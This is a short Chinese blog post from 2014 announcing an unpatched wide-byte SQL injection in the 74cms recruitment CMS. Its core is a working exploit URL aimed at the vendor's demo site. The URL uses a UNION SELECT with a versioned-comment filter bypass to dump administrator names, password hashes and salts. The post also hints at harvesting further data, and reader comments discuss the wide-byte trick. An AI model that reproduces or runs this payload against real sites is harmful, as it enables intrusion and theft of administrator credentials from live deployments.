74cms最新通杀注入漏洞

一个iconv引发的猪肉

经过测试官网居然没补。。。

bypass

md5解不开,但是可以用来爆各种信息 你懂的

exp:http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

 

link:http://www.wooyun.org/bugs/wooyun-2014-055020

文 / admin
3 COMMENTS
  1. 2014/05/27
    xiaocheng

    宽字节?

  2. 2014/05/27
    xiaocheng

    錦’ %E9%8C%A6%27 麻烦解释下

  3. 2014/05/27
    xiaocheng

    就一宽字节注入,我想多了。。。。。汗。。。。。。。楼主博客用360网站卫士真猥琐

LEAVE A REPLY

loading